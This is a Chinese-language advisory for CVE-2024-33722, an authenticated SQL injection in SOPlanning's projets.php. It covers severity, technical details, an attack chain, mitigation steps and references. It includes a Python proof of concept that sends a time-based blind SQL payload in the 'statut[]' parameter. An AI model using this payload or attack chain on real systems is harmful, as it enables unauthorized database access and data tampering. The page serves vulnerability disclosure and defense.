CVE-2024-33722 SOPlanning SQL注入漏洞

漏洞信息

漏洞编号

CVE-2024-33722

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

SOPlanning

漏洞概述

SOPlanning 1.52.00版本存在SQL注入漏洞。由于`projets.php`文件未能正确过滤`statut[]`参数，经过身份认证的攻击者可利用该漏洞执行恶意SQL语句，进而窃取数据库敏感信息或破坏数据完整性。

技术细节

该漏洞出在SOPlanning的`projets.php`处理逻辑中。当用户提交状态筛选请求时，`statut[]`参数被直接拼接到SQL查询语句中，未经过充分的输入验证或使用预处理语句。攻击者可以通过构造包含SQL元字符（如单引号、注释符）的数组数据注入恶意代码。由于漏洞需要低权限用户认证（PR:L），攻击者需先获取合法账户。利用成功后，攻击者可读取数据库内容（如用户密码哈希），修改项目数据，或在特定条件下执行系统命令，严重威胁应用安全。

攻击链分析

STEP 1

侦察与信息收集

攻击者识别目标是否运行SOPlanning，并确定其版本为1.52.00或更早版本。

STEP 2

获取凭证

由于需要低权限认证，攻击者通过钓鱼、暴力破解或注册默认账户获取有效的用户凭证。

STEP 3

漏洞利用

攻击者使用获取的凭证登录，并向`projets.php`发送POST请求，在`statut[]`参数中注入恶意SQL代码。

STEP 4

数据窃取与破坏

成功注入后，攻击者从数据库中提取敏感数据（如管理员密码、项目信息），或执行UPDATE/DELETE操作破坏数据完整性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
url = "http://target/soplanning/projets.php"
# Requires a valid authenticated session (cookies)
cookies = {
    "soplanning_session": "valid_session_cookie_here"
}

# Malicious payload targeting the 'statut[]' parameter
# This payload attempts a time-based blind injection
payload = {
    "statut[]": "1' AND (SELECT SLEEP(5))-- -"
}

try:
    response = requests.post(url, data=payload, cookies=cookies, timeout=10)
    if response.elapsed.total_seconds() >= 5:
        print("[+] Vulnerability confirmed: SQL Injection detected via statut[] parameter.")
    else:
        print("[-] Injection failed or not vulnerable.")
except Exception as e:
    print(f"Error: {e}")

影响范围

SOPlanning <= 1.52.00

防御指南

临时缓解措施

在未升级补丁前，建议限制对`projets.php`接口的网络访问，仅允许可信IP访问。同时，加强对数据库活动的监控，查找异常的查询行为，并确保所有用户账户使用强密码。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2024-33722
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2024-33722
3 Details https://www.cvedetails.com/cve/CVE-2024-33722/
4 VulDB https://vuldb.com/cve/CVE-2024-33722
5 Link https://github.com/fuzzlove/soplanning-1.52-exploits